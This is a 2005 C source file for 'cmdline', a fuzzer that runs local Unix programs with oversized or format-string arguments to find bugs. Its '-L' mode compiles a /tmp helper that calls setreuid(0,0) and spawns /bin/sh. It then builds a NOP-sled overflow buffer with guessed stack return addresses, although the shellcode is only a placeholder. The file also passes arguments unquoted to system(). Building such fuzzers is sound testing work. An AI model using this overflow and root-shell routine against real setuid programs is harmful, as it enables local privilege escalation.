/*  Copyright (c) 2005, Applied Security, Inc.
    Jared DeMott, jdemott@appliedsec.com, www.appliedsec.com

    This file is part of cmdline.

    Cmdline is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    CmdLine is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Cmdline; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/

#include <stdlib.h>
#include <stdio.h>

char shell[]=
"some shell that uses /tmp/ui";

#define NOP 0x90
#define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); printf( \"worked!!\\n\"); } \n"

void buildui() {
	FILE *fp;
	char cc[100];
	
	fp = fopen("/tmp/ui.c", "w");
	fprintf(fp, CODE);
	fclose(fp);
	snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
	system(cc);
}

/*This is the routine to print a buffer*/
void PRINT(int count, const char *lable, const char *buffer)
{
	int i;
	printf("\n");
	printf("%s[chars]= ", lable);
	printf("\n");
	for(i=0; i<count; i++)
	{
		printf("%c", buffer[i]);
	}
	printf("\n");
	printf("%s[hex]= ", lable);
	printf("\n");

	for(i=0; i<count; i++)
	{
		printf("%x ", (0xff&buffer[i]));
	}
	printf("\n");
}
	

int main(int argc, char *argv[]) {

	int offset, i, j, shift, BufLen, FormatLen, len, c, numARGs, MemSize = 0;
	char BufChar, FormatChar;
	char *binary, *SearchBinary; 
	long int addr;
	char *buf, *Command, *CommandBeg, *C;
	unsigned long sp = (unsigned long)&sp;

	if(argc<3)
	{
		printf("\nBy: Jared DeMott - Applied Security, Inc.\n\n");
		printf("This program is intended to facilate the discovery of bugs in local *NIX\n");
		printf("applications by executing programs with long or otherwise malicious arguments.\n");
		printf("Typically cmdline should call this program, but it can be used manually.\n\n");
		printf("Manual Usage:  %s prog <arg1> [arg2] ... [argn]\n", argv[0]);
		printf("  arg - argument must be in the form attacktype:size:char.\n");
		printf("        arguments without colons will be used as static strings.\n\n");
		printf("  Attack types:\n");
		printf("    1 - buffer attack\n");
		printf("    2 - format attack\n\n");
		printf("  Example:\n"); 
		printf("  './cmd ls hi 1:10:A' will execute 'ls hi AAAAAAAAAA'.\n\n"); 
		printf("Usage used by cmdline: %s -L offset shift BufLen prog <arg1> [arg2] ... [argn]\n\n", argv[0]);
			exit(0);
	}
	if( strcmp("-L", argv[1]) == 0)
	{	
		buildui();
		if(argc != 7) {
			printf("\nBy: Jared DeMott\n");
			printf("Usage:  %s offset shift BufLen binary ARGs\n", argv[0]);
			printf("\t When inputing the binary, use the fully qualified path\n");
			exit(0);
		}
		else {
			offset=atoi(argv[2]);
			shift=atoi(argv[3]);
			BufLen=atoi(argv[4]);
			binary=argv[5];
		}	
		buf = malloc(BufLen); 
		/*addr=0x080412341 + offset;*/
		addr=sp + offset; 

		memset(buf, NOP, BufLen);
		memcpy(buf + (BufLen/2), shell, strlen (shell));
		for(i=((BufLen/2) + strlen (shell)) + shift; i < BufLen - 4; i+=4)
			*(int *)&buf[i]=addr;
		printf("Stressing Binary: %s\n Using addr: 0x%x with offset %d and shift %d\n", binary,addr,offset,shift);

		PRINT(BufLen, "SHELLCODE", buf); 

		SearchBinary = strrchr(binary, 0x2f);
		SearchBinary++;
		execl(binary, SearchBinary, buf, NULL);
	}
	else
	{
		/* parses command line arguments and calulates the total size of the final buffer*/		
		for(i=2;i<argc;i++)
		{
			C=argv[i];
			switch(C[0])
			{
				/*Construct a buffer of the size/type the user specified. Replace that with the current argv*/  
				case '1':
					if( (C=strchr(C, ':')) == NULL)
						break;
					C++;
					if ( (atoi(C) < 0) )
					{
						printf("\n\n 'cmd': The Buffer length must not be less then zero!\n\n");
						exit(-1);
					}
					BufLen=atoi(C);
					if ( (C=strchr(C, ':')) == NULL)
					{
						printf("'cmd': Bad indicator; cannot parse.\n");
						exit(-1);
					}
					C++;
					BufChar=*C;	
					buf = malloc(BufLen + 1);
					memset(buf, BufChar, BufLen);
					*(buf+BufLen) = 0x00;
					argv[i]=buf; 
					break;

				/*Construct a buffer of the size/type the user specified. Replace that with the current argv*/  
				/*Note the buffer will be twice as large as the user supplied because % symbols must be 
				placed in front of the character they supply.*/
				case '2':
					if( (C=strchr(C, ':')) == NULL)
						break;
					C++;
					BufLen=2*atoi(C);
					if( (C=strchr(C, ':')) == NULL)
					{
						printf("'cmd': Bad indicator; cannot parse.\n");
						exit(-1);
					}
					C++;
					if ( (atoi(C) < 0) )
					{
						printf("\n\n 'cmd': The Buffer length must not be less then zero!\n\n");
						exit(-1);
					}
					BufChar=*C;	
					buf=malloc(BufLen + 1);
					for(j=0;j<BufLen-1;j+=2)
					{
						buf[j]=0x25;
						buf[j+1]=BufChar;
					} 
					*(buf+BufLen) = 0x00;
					argv[i]=buf;
					break;

				default:
					break;
			}
			/*Calculates the size of the final buffer.  It's based on the newly replaced argv.  One is added for spaces*/
			MemSize= MemSize + strlen(argv[i]) + 1;
		}
		MemSize = MemSize + strlen(argv[1]) + 20;
		
		Command=malloc(MemSize);
		CommandBeg=Command;

		/* constructs the final command to be executed*/
		for(i=1;i<argc;i++)
		{
			sprintf(Command, "%s%c", argv[i], 0x20);
			Command = Command + strlen(argv[i]) +1;
		}
		sprintf(Command, "%c", '&');				
		*(Command+1) = 0x00;
		/*PRINT(strlen(CommandBeg), "CommandBeg", CommandBeg);
		printf("strlen = %d , MemSize = %d\n", strlen(CommandBeg), MemSize);*/
		system(CommandBeg);
		free(CommandBeg);
	}
	exit(0);
}
